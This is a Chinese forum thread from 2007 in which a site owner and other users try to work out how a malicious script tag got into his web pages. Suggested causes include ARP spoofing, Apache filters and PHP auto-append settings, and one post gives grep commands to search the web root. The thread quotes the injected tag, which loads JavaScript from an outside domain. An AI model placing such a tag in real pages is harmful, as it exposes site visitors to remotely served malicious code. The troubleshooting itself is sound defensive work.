免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
楼主: hq22
打印 上一主题 下一主题

今天出现了奇怪的问题,网页病毒 [复制链接]

论坛徽章:
0
21 [报告]
发表于 2007-01-29 15:44 |只看该作者
我的情况和你有点不同,我是网页里有个链接地址被修改了。但本机正常,apache换端口访问正常,同一网段其它机器访问正常。在这里和linuxsir发帖,都无人回答,最终也没查出问题。。。

论坛徽章:
0
22 [报告]
发表于 2007-01-29 16:01 |只看该作者
原帖由 飘雪心辰 于 2007-1-29 15:44 发表于 20楼  
============================
你的php不是配置成自动附加某一文件的话 ,你的这段调用js的代码恳定是在你服务器上的。
楼主呀,我就算是代表我们这一些人,能不能把你的这张病毒网页地址发给偶们这帮人瞧瞧。 ...


现在想起来了,是这个地址
<script src=http://waigua9999.com/1.js></script>
申明:浏览前请确保自己的电脑不被感染病毒,由此造成的损失与我无关。

论坛徽章:
0
23 [报告]
发表于 2007-01-29 17:22 |只看该作者
原帖由 hq22 于 2007-1-29 16:01 发表于 22楼  


现在想起来了,是这个地址
<script src=http://waigua9999.com/1.js></script>
申明:浏览前请确保自己的电脑不被感染病毒,由此造成的损失与我无关。

我的机子,卡吧开这个网页,不怕吧?

论坛徽章:
0
24 [报告]
发表于 2007-01-29 18:17 |只看该作者
原帖由 hq22 于 2007-1-29 16:01 发表于 22楼  


现在想起来了,是这个地址
<script src=http://waigua9999.com/1.js></script>
申明:浏览前请确保自己的电脑不被感染病毒,由此造成的损失与我无关。


您给的这个url的ip是来自 61.152.114.102 ,请核对是否与您的租用主机在同一主机上?或者同一段ip内??? 如果是的话,在server上动了手脚地可能性粉大;

如果不是,那么能否说说您的web构成:比如server那边是使用什么脚本语言,或者如果是静态html的话是否存在从数据库里取广告,或者取第三方数据/js调用的情形???

论坛徽章:
0
25 [报告]
发表于 2007-01-29 18:25 |只看该作者
访问了那页面。。。最后出来个。。。


锄禾日当午

论坛徽章:
0
26 [报告]
发表于 2007-01-29 18:48 |只看该作者
原帖由 skylove 于 2007-1-29 18:17 发表于 24楼  


您给的这个url的ip是来自 61.152.114.102 ,请核对是否与您的租用主机在同一主机上?或者同一段ip内??? 如果是的话,在server上动了手脚地可能性粉大;

如果不是,那么能否说说您的web构成:比如serv ...


我的ip段是202.,跟他无关,网页文件是我写的,没有你说的任何可能,我基本确定不是网页文件原因,要么是网络传输过程中添加的,要么是服务器被开了什么进程,等访问网页时候自动添加上去的。

论坛徽章:
0
27 [报告]
发表于 2007-01-29 18:49 |只看该作者
问一下楼主,这个现象还有可能重现吗?
另外,apache 的日志里有什么敏感信息没有,包括 access 和 error 里面,在发现有病毒的时间前?

论坛徽章:
0
28 [报告]
发表于 2007-01-30 14:39 |只看该作者
经过测试使用Ext_Filter可以达到修改网页任何部分的功能,但是必须修改apache的conf来达到,如果conf未被修改,那是怎么达到的呢?

论坛徽章:
0
29 [报告]
发表于 2007-01-30 14:59 |只看该作者
同网段中有别的电脑中病毒了,造成类似arp欺骗的情况,前段时间我们也出现这个问题,主机是托管的,让IDC去查,没多久就解决了.

论坛徽章:
0
30 [报告]
发表于 2007-01-30 15:29 |只看该作者
==================
你可对准网站目录,先检索里面有没直接包含此文件的页面。
比如检索/var/www/html/目录:

  1. grep -Ri '1.js' /var/www/html/
  2. grep -Ri '9999' /var/www/html/
  3. grep -Ri 'waigua' /var/www/html/
复制代码

有没结果。
你用php,那php的配置文件里面这两 语句后面有没什么东东:
; Automatically add files before or after any PHP document.
auto_prepend_file =
auto_append_file =
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP